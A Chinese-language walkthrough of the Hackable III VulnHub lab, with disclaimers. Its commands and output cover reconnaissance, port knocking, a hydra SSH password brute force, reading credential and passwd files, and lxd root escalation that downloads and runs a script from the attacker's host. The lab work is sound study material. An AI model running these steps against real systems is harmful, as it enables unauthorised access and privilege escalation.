免责声明本文记录的是 Hackable III 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/hackable/hackable3.ova一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:2f:d8:88 PCS Systemtechnik GmbH 192.168.5.12 08:00:27:79:d5:0f PCS Systemtechnik GmbH ​ 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.968 seconds (130.08 hosts/sec). 3 respondednmap -sP 192.168.5.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 02:53 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00014s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00015s latency). MAC Address: 08:00:27:2F:D8:88 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.12 Host is up (0.00016s latency). MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.5 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 4.41 seconds目标IP192.168.5.122、探测目标IP开放端口nmap -sV -p- 192.168.5.12┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.12 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 02:54 -0400 Nmap scan report for 192.168.5.12 Host is up (0.000095s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.46 ((Ubuntu)) MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC) ​ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds ​端口22、803、目录探测dirsearch -u http://192.168.5.12┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.12 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.12/_26-03-23_04-21-48.txt Target: http://192.168.5.12/ [04:21:48] Starting: [04:21:48] 301 - 309B - /js - http://192.168.5.12/js/ [04:21:49] 403 - 277B - /.ht_wsr.txt [04:21:49] 403 - 277B - /.htaccess.bak1 [04:21:49] 403 - 277B - /.htaccess.orig [04:21:49] 403 - 277B - /.htaccess.sample [04:21:49] 403 - 277B - /.htaccess.save [04:21:49] 403 - 277B - /.htaccess_extra [04:21:49] 403 - 277B - /.htaccess_sc [04:21:49] 403 - 277B - /.htaccessOLD [04:21:49] 403 - 277B - /.htaccess_orig [04:21:49] 403 - 277B - /.htaccessOLD2 [04:21:49] 403 - 277B - /.htaccessBAK [04:21:49] 403 - 277B - /.htm [04:21:49] 403 - 277B - /.html [04:21:49] 403 - 277B - /.htpasswd_test [04:21:49] 403 - 277B - /.htpasswds [04:21:49] 403 - 277B - /.httr-oauth [04:21:57] 301 - 313B - /backup - http://192.168.5.12/backup/ [04:21:57] 200 - 458B - /backup/ [04:21:59] 301 - 313B - /config - http://192.168.5.12/config/ [04:21:59] 200 - 507B - /config.php [04:21:59] 200 - 450B - /config/ [04:22:00] 301 - 310B - /css - http://192.168.5.12/css/ [04:22:04] 200 - 3KB - /home.html [04:22:05] 200 - 454B - /js/ [04:22:07] 200 - 487B - /login.php [04:22:14] 200 - 33B - /robots.txt [04:22:14] 403 - 277B - /server-status [04:22:14] 403 - 277B - /server-status/ Task Completed二、漏洞利用1、信息搜集http://192.168.5.12/先F12查看一下源代码发现了一个邮箱和一个用户jubiscleudo还有/robots.txt/进行访问!-- Please, jubiscleudo, dont forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suporthackable3.com --/backup/下有个wordlist.txt字典wget命令进行下载wget http://192.168.5.12/backup/wordlist.txt/config/进行base64编码解密得到10000http://192.168.5.12/config//css/下面也有东西Brainfuck解码得到4444[-]------------------....在login.php得源代码中发现了3.jpg进行访问steghide进行解密得到65535http://192.168.5.12/login.phphttp://192.168.5.12/3.jpg# 下载照片 wget http://192.168.5.12/3.jpg # 提取数据 steghide extract -sf 3.jpg # 查看文件 cat steganopayload148505.txt┌──(root㉿kali)-[~] └─# wget http://192.168.5.12/3.jpg --2026-03-23 04:31:49-- http://192.168.5.12/3.jpg 正在连接 192.168.5.12:80... 已连接。 已发出 HTTP 请求正在等待回应... 200 OK 长度61259 (60K) [image/jpeg] 正在保存至: “3.jpg” 3.jpg 100%[] 59.82K --.-KB/s 用时 0s 2026-03-23 04:31:49 (462 MB/s) - 已保存 “3.jpg” [61259/61259]) ┌──(root㉿kali)-[~] └─# steghide extract -sf 3.jpg Enter passphrase: wrote extracted data to steganopayload148505.txt. ┌──(root㉿kali)-[~] └─# cat steganopayload148505.txt porta:65535推测端口敲门端口顺序10000444465535而且还给了22端口2、端口敲门knock 192.168.5.12 10000 4444 65535 nmap -sV -p- 192.168.5.12┌──(root㉿kali)-[~] └─# knock 192.168.5.12 10000 4444 65535 ┌──(root㉿kali)-[~] └─# ┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.12 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 04:39 -0400 Nmap scan report for 192.168.5.12 Host is up (0.00010s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.46 ((Ubuntu)) MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds3、SSH暴力破解这里我们的思路就是刚刚得到个字典进行ssh爆破密码 使用工具hydra得到密码onlymy尝试登入登入成功hydra -l jubiscleudo -P wordlist.txt 192.168.5.12 ssh┌──(root㉿kali)-[~] └─# hydra -l jubiscleudo -P wordlist.txt 192.168.5.12 ssh Hydra v9.6 (c) 2023 by van Hauser/THC David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-23 04:41:28 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 300 login tries (l:1/p:300), ~19 tries per task [DATA] attacking ssh://192.168.5.12:22/ [22][ssh] host: 192.168.5.12 login: jubiscleudo password: onlymy 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-23 04:42:27 ┌──(root㉿kali)-[~] └─#4、ssh登录ssh jubiscleudo192.168.5.12 密码onlymy┌──(root㉿kali)-[~] └─# ssh jubiscleudo192.168.5.12 The authenticity of host 192.168.5.12 (192.168.5.12) cant be established. ED25519 key fingerprint is: SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYxGZaCVrzrHIL4rem4 This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.5.12 (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html jubiscleudo192.168.5.12s password: Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Mar 23 01:45:15 PM UTC 2026 System load: 0.0 Memory usage: 45% Processes: 112 Usage of /: 19.7% of 23.99GB Swap usage: 0% Users logged in: 0 There were exceptions while processing one or more plugins. See /var/log/landscape/sysinfo.log for more information. 0 updates can be installed immediately. 0 of these updates are security updates. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings Last login: Thu Apr 29 16:19:07 2021 from 192.168.2.106 jubiscleudoubuntu20:~$5、信息搜集发现了一个新用户hackable_3和密码TrOLLED_3jubiscleudoubuntu20:~$ cd /var/www/html/ jubiscleudoubuntu20:/var/www/html$ ls 3.jpg config css imagens js login.php backup config.php home.html index.html login_page robots.txt jubiscleudoubuntu20:/var/www/html$ jubiscleudoubuntu20:/var/www/html$ jubiscleudoubuntu20:/var/www/html$ jubiscleudoubuntu20:/var/www/html$ cat config.php ?php /* Database credentials. Assuming you are running MySQL server with default setting (user root with no password) */ define(DB_SERVER, localhost); define(DB_USERNAME, root); define(DB_PASSWORD, ); define(DB_NAME, hackable); /* Attempt to connect to MySQL database */ $conexao mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); // Check connection if($conexao false){ die(ERROR: Could not connect. . mysqli_connect_error()); } else { } ? jubiscleudoubuntu20:/var/www/html$ jubiscleudoubuntu20:/var/www/html$ jubiscleudoubuntu20:/var/www/html$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash jubiscleudoubuntu20:/var/www/html$5、切换用户su hackable_3 密码TrOLLED_3jubiscleudoubuntu20:/var/www/html$ su hackable_3 Password: hackable_3ubuntu20:/var/www/html$ cd hackable_3ubuntu20:~$6、lxd提权lxd提权原理是下载一个镜像使用镜像创建容器将容器目录直接映射到物理主机目录即可在容器中直接访问物理主机的文件查看当前系统中的镜像lxc image listkaligit clone https://github.com/saghul/lxd-alpine-builder/ ls python -m http.server 8000目标靶机cd /tmp wget http://192.168.5.5:8000/lxd-alpine-builder/alpine-v3.13-x86_64-20210218_0139.tar.gz wget http://192.168.5.5:8000/lxd-alpine-builder/build-alpine ls sed -i s,yaml_pathlatest-stable/releases/$apk_arch/latest-releases.yaml,yaml_pathv3.8/releases/$apk_arch/latest-releases.yaml, build-alpine sudo ./build-alpine -a i686 lxc image import ./alpine*.tar.gz --alias myimage lxd init lxc init myimage mycontainer -c security.privilegedtrue lxc config device add mycontainer mydevice disk source/ path/mnt/root recursivetrue lxc start mycontainer lxc exec mycontainer /bin/sh本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。